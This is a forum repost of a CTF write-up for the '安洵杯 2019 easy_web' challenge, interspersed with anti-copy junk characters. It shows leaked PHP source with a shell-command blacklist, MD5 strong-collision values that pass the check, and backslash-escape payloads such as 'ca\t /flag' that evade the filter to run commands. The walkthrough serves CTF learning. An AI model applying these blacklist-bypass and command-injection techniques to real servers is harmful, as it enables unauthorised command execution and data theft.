飞雪团队

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 17310|回复: 0

[安洵杯 2019]easy_web

[复制链接]

8993

主题

9081

帖子

2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
29309
发表于 2022-2-12 14:35:42 | 显示全部楼层 |阅读模式
6 K! }8 }8 n/ X8 f
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>1 S6 o% `1 \& X
<p>&nbsp;</p>
, n6 K! X5 M$ ]3 h1 s. o" _7 A<p>&nbsp;</p># ]2 K8 I. W. M* e9 x$ q( k
<p>&nbsp;题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=,同时查看源代码</p>
, N6 ~: {, x7 l/ o<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
% H4 u) F( h+ L/ n8 \<p>&nbsp;</p>
/ S: x9 u/ R' F1 f9 [6 ~<p>&nbsp;</p>' p, D7 {( U0 [9 u7 J! z* n
<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>
7 B9 F6 j# n9 ?; Q4 s<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>
8 x) f% o! I0 \! y7 {<p>首先把那个进行一次base64位解码</p>
: i. b, ~- @. y0 z: I3 N<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
4 X$ V9 u8 Q: W; P# o% k1 e+ X+ {<p>&nbsp;</p>0 h1 Y# U, M# V! j" X) Q
<p>&nbsp;</p>
, S3 E  }; Y1 E; Z4 {+ \2 n<p>&nbsp;解码一次以后还是很像base64编码,于是又解码一次</p>
2 C4 R; i9 A" j' r( M" a1 c<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
) I" L( P3 X( f" y" G, t<p>&nbsp;</p>8 @+ k, K! E" u: t* [7 P
<p>&nbsp;</p>
1 X( T+ @" w0 I5 o<p>&nbsp;然后用hex解码一下得到了</p>0 W1 `* W7 K8 r$ v; I; b2 O6 E" k
<div class="cnblogs_Highlighter">, G2 J! N/ ?8 e! E- X# S" x
<pre class="brush:sql;gutter:true;">555.png6 C9 f% Q9 A% z: m- |
</pre>' A1 i( P6 O+ M# ~7 R8 h
</div># C4 Z8 p" o3 t6 [# n$ M' u
<p>  用同样的方法把index.php进行加密</p>6 G1 H" i9 p2 C) i- c7 h( R- g% b
<div class="cnblogs_Highlighter">2 p5 S" X  {8 z* t
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3  p% J* _* f, f( M0 c# F: M# y
</pre>
) B6 C4 b7 A; T</div>
3 ]3 |* D9 g5 q<p>  然后输入到地址栏</p>
& _+ [( `/ g+ }* F. }0 m<p>&nbsp;然后查看源代码,把源代码里面的那一串base64的编码解码</p>) `% F. I( ~# |, Z
<div class="cnblogs_code">
" V# _# J% z6 S" \<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
0 h( t/ U! v0 G' a9 g. G' ?</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
& e+ l8 h! `+ N' l* Z</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
* ]  k9 b4 X3 a4 o8 u8 `</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];' [8 e5 ]0 W$ Q2 U  |
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) ! T& P$ ?: B+ Q) Q- o* N
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);$ y. s! m9 v" N8 Z+ K' D
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));' H. w& l* z* ]5 p$ S  O* n
2 ?7 q1 N8 E9 P; R% f3 U
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);2 m% m) M2 m3 L5 z% A7 K7 E+ l
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {8 u$ b, b- U& x% k0 `( q: w
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;3 K/ C( X" c3 c- w2 H* V0 t3 I
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
- `) h, z( P' e& w} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {4 Q( O+ W( N9 i/ o
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));! S. b+ j" h0 J2 o
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;5 q0 {  R/ ]% {. A
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;( N$ ]4 r" @6 u$ N4 F% h1 @
}
" D. V8 U7 S6 ~</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
5 S" L7 n) j" Q; x! s; }$ C</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;! B' X1 j, I( C; p$ U+ |
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {7 }2 O% U" ]5 @- j& S- M0 y
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
  R& e* Y" ^6 }1 M) r! _5 k    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
3 D7 B4 X, D/ P: ~* Z( n} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {  a" n. _0 ^7 v* `. [' D
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {5 h2 U. e7 r* x* d/ P( p3 k
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;& o6 i" C: v3 @2 ]& u2 N, r
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {, H: m% A- u  ?
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);& y( h) t2 l" t' W' X/ ]
    }
4 J4 `& R/ v" Z* i. `: I! B}
! ]  e4 L7 |* _. s, H2 ^3 \, [6 L# g/ f$ x, z7 K$ u; i# a- ?
</span>?&gt;
9 ]0 r1 ^, x$ ^$ i! Y4 ~0 @&lt;html&gt;! C( `! u% X# `" |2 V
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
( C- n9 ?& L9 V* g4 K; w8 D. b) k  body{$ l7 j. ~; k4 Y- j1 v4 ?" {% V
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;* l2 ?; \" ^7 ]* l. ]3 d& g
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
9 b5 ~; |2 H$ p; }1 s' L   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
2 Q! v. x( Q) o0 c2 {' M5 c' S4 ^   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
( R% R2 J+ F8 L& n" R<span style="color: rgba(0, 0, 0, 1)">}2 P1 b; ^9 M7 M+ \3 @
</span>&lt;/style&gt;
& k  ~! [% v- x- K; f: X3 ^, k) X&lt;body&gt;. v3 u8 l: Q) R. J4 Y7 J
&lt;/body&gt;" k2 i7 h: ^; f
&lt;/html&gt;</pre>; r  V" X9 P, E' R/ C" a
</div>
3 a- t- X  X# Z+ E8 [1 S! K& `' m% a+ E, I<p>结合前面的推断,关键代码就在</p>
0 [/ R0 N0 o. e8 {2 f+ d<div class="cnblogs_code">* n+ \% l) S5 @
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
( _7 J7 A3 F9 T) |) A7 ?; s8 S! o        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
! S- I! W7 O$ g$ s    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
7 c( K; x- W6 a, |. m        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
$ u4 Z. c' Z( E: \+ y4 r! i- |4 J0 J    }</span></pre>' D( P! H4 W. @) E8 l7 j! b
</div>
& S6 p( J: a. L2 r' }( T1 U$ N<p>这种MD5是md5强碰撞</p>( n6 J, N" d9 r. W& l9 W
<div class="cnblogs_Highlighter">
) F& i6 J; {" E$ [! q! j, U9 H<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
. H/ U& r( t+ t; R4 t: X. U; D5 S" M, v</pre>: R/ L1 |  @# e& E- `' m
</div>2 k, _' H( o: ^: Z' V% q
<div class="cnblogs_Highlighter">
. P3 k+ A# }* n& g2 G& `; d<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a21 Z! @- X% V& j8 I- E
</pre>
" |  R& |$ P' ]+ N, n; f0 a" E</div>: a9 K$ v0 i( _$ W' {7 |
<p>  只需要这样就可以把cmd里面的当成命令来处理。</p>
: `, ~3 D9 Z5 P# S<p>于是采用payload:</p>
4 L2 Y) B" W  D) Y% B4 k<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>6 t  q. |, n5 r! m/ T2 {  H
<p>&nbsp;</p>8 s5 w* p" ^' o$ U8 T2 [9 v: o
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
) I0 Y) u8 j% Y- j  x$ \! W<p>ls和l\s在命令执行的时候结果是一样的。</p>
. Y, a5 i$ ^- w" X6 U<p>然后发现根目录里面有/flag</p>
4 k# Q) w, D( ]! O/ p- a  V  X" Q<p>于是payload:</p>4 [: [" \3 u: y! s# v; S# B+ l
<div class="cnblogs_Highlighter">
; k) ~8 Y( `2 H) O8 [# _) r, h1 k<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
9 s- M6 H1 T% C</pre>
; L  \! a4 \4 ^$ o7 B' ~. V</div>
' Z. t3 T5 L# h$ Z; c6 Y- ]9 U<p>  对于这个题目,因为他没有屏蔽sort和dir</p>; F; a/ Z0 k/ \- g
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>2 l7 i' p0 i5 }( T) X
<p>&nbsp;</p>6 |4 q; A8 n2 j- B( e9 ?
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|飞雪团队

GMT+8, 2026-7-12 07:18 , Processed in 0.066568 second(s), 21 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表